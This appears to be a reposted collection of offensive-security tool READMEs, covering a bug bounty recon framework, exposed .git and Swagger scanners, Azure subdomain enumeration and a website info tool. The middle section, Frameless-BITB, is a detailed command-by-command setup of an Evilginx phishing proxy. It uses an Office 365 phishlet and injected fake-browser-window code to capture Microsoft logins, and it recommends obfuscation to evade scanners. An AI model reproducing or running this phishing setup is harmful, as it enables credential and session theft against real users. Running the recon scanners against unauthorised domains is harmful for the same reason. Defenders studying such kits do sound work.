
Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

By: Zion3R



Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers quickly and easily understand real-world security concepts that directly translate to a high-paying career in Cyber Security.

In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this GitHub repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using GitHub to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

My hope is that this modular framework will act as a canvas to help share what I've learned over my career with the next generation of Security Engineers! Trust me, we need all the help we can get!!


Quick Start

Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh

Download Latest Stable ALPHA Version

wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz

Install

The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to run the framework outside of a clean Kali install, I will not be able to help troubleshoot any issues you run into.

./install.sh

This video shows exactly what to expect from a successful installation.

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./install.sh --arm

You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
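
As a rough sketch of what adding a key manually might look like (the exact file names the framework expects are not documented here, so the name below is an assumption):

# Hypothetical example: drop an API key into the ~/.keys directory
mkdir -p ~/.keys
echo "YOUR_SHODAN_API_KEY" > ~/.keys/shodan
chmod 600 ~/.keys/shodan   # keep API keys readable by your user only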

Run the Web Application (Client and Server)

Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.

./run.sh

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./run.sh --arm

Core Modules

The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

Wildfire

At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

How it works:

  1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
  2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
  3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.

Running Wildfire:

Graphical User Interface (GUI)

Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.

Command Line Interface (CLI)

All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

python3 wildfire.py --start --cloud --scan
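
Judging by their names, the flags appear to map to the Sub-Modules described below; this mapping is an assumption based on the flag names, not documented behavior:

# --start : Fire-Starter (subdomain/DNS recon)
# --cloud : Fire-Cloud   (cloud enumeration)
# --scan  : Fire-Scanner (Nuclei-based scanning)
python3 wildfire.py --start   # e.g. run only the recon Sub-Module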

Slowburn

Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

To initialize Slowburn, simply run the following command:

python3 slowburn.py --initialize

Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

python3 slowburn.py

Sub-Modules

The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

Fire-Starter

Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

Fire-Starter runs a series of open-source tools to enumerate hidden subdomains, DNS records, and ASNs, identifying where those external entries are hosted. Currently, it chains together the following widely used open-source tools:

  • Amass
  • Sublist3r
  • Assetfinder
  • Get All URLs (GAU)
  • Certificate Transparency Logs (CRT)
  • Subfinder
  • ShuffleDNS
  • GoSpider
  • Subdomainizer

These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
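
To illustrate the general idea (not the framework's actual internals), a manual pass with a few of these tools might look like the following sketch; output paths are arbitrary examples:

# Minimal sketch of chaining subdomain tools by hand; the framework automates
# this and merges the results for the other Sub-Modules
subfinder -d example.com -silent > subs-subfinder.txt
assetfinder --subs-only example.com > subs-assetfinder.txt
amass enum -passive -d example.com -o subs-amass.txt
sort -u subs-subfinder.txt subs-assetfinder.txt subs-amass.txt > all-subs.txt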

Once the scan is complete, the Dashboard will be updated and available to the user.

Most Sub-Modules in The Ars0n Framework require the data collected by the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

Fire-Cloud

Coming soon...

Fire-Scanner

Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

Troubleshooting

The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can behave unexpectedly if conflicts emerge with any existing service/tool running on the user's system. This complexity is why The Ars0n Framework should only be run on a clean installation of Kali Linux.

Another very common issue is caused by MongoDB not installing and/or running successfully on the user's machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
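
A couple of quick checks can at least confirm whether MongoDB is the culprit (assuming the standard mongod service name and default port):

# Check the MongoDB service state and confirm something is listening on 27017
sudo systemctl status mongod --no-pager
sudo ss -ltnp | grep 27017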

Frequently Asked Questions

Coming soon...



Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

β˜•οΈŽ Buy Me A Coffee

Video Tutorial: πŸ‘‡

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
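
As a toy illustration of the substitution idea (not the actual rules shipped with this project, which live under custom-subs/ and are far more involved), Apache's mod_substitute can inject markup into every proxied HTML response:

# Hypothetical example: inject a stylesheet tag into proxied pages.
# The config file name and injected tag are assumptions for illustration only.
sudo tee /etc/apache2/conf-available/bitb-example.conf > /dev/null <<'EOF'
AddOutputFilterByType SUBSTITUTE text/html
Substitute "s|</head>|<link rel='stylesheet' href='/bitb/window.css'></head>|i"
EOF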

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMware Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to the user's home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get a Failed to start nameserver on: :53 error, try modifying this file:

sudo nano /etc/systemd/resolved.conf

Edit/add the DNSStubListener line and set it to no: DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Verify that Apache and the VM's networking work by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)

sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs, for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode, and they should act as base templates for achieving the same on other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

To make this next step easier, I included both versions as separate files.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click File > Open (top-left), and in the File Explorer address bar, paste the following:

C:\Windows\System32\drivers\etc\

Change the file type filter (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME], but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com, so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: when saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic; instead, place the certificate in a specific store: select "Trusted Root Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

By: Zion3R


RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.


Features
  • Automated scanning of domains and subdomains for exposed .git repositories.
  • Streamlines the detection of sensitive data exposures.
  • User-friendly command-line interface.
  • Ideal for security audits and bug bounty hunting.

Installation

Clone the repository and install the required dependencies:

git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py

Usage

RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

To start RepoReaper, simply run:

./RepoReaper.py
or
python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:

Enter the path of the file containing domains

Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

example.com
subdomain.example.com
anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.
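
The underlying check is conceptually simple; a hand-rolled version might look like this sketch (RepoReaper's own logic, including its false-positive handling, is more thorough):

# Minimal sketch: an exposed .git usually serves /.git/HEAD starting with "ref:"
while read -r domain; do
    if curl -sk --max-time 5 "https://$domain/.git/HEAD" | grep -q "^ref:"; then
        echo "[+] Possible exposed .git: $domain"
    fi
done < domains.txt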


Disclaimer

This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



AzSubEnum - Azure Service Subdomain Enumeration

By: Zion3R


AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


How it works

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
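
The permutation-plus-resolution approach can be sketched in a few lines of shell; the Azure suffixes below are real service domains, but the wordlist and logic are a simplified assumption of what the tool does:

# Simplified sketch of Azure service subdomain permutation
BASE="retailcorp"
for word in dev test prod; do
    for suffix in azurewebsites.net blob.core.windows.net vault.azure.net; do
        fqdn="${BASE}-${word}.${suffix}"
        host "$fqdn" > /dev/null 2>&1 && echo "[+] $fqdn resolves"
    done
done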


Why did I create this?

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool Invoke-EnumerateAzureSubDomains from NetSPI was unable to run on PowerShell under Debian. Consequently, I created a crude implementation of that tool in Python.


Usage
➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

options:
  -h, --help            show this help message and exit
  -b BASE, --base BASE  Base name to use
  -v, --verbose         Show verbose output
  -t THREADS, --threads THREADS
                        Number of threads for concurrent execution
  -p PERMUTATIONS, --permutations PERMUTATIONS
                        File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --threads 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose




APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, grouped by similarity and ranked by potential risk level; a quick manual spot-check example follows the summary below:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.
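
As a quick manual spot-check outside APIDetector, one could probe a single high-risk path by hand (the host below is a placeholder):

# Manually probe one high-risk endpoint; a 200 response deserves a closer look
curl -s -o /dev/null -w "%{http_code}\n" "https://example.com/swagger-ui.html"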

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



PathFinder - Tool That Provides Information About A Website

By: Zion3R


Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.


  • Retrieve important information about a website
  • Gain insights into the technologies used by a website
  • Identify subdomains and DNS information
  • Check firewall names and certificate details
  • Perform bypass operations for captcha and JavaScript content

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PathFinder.git
  2. Install the required packages:

    pip install -r requirements.txt

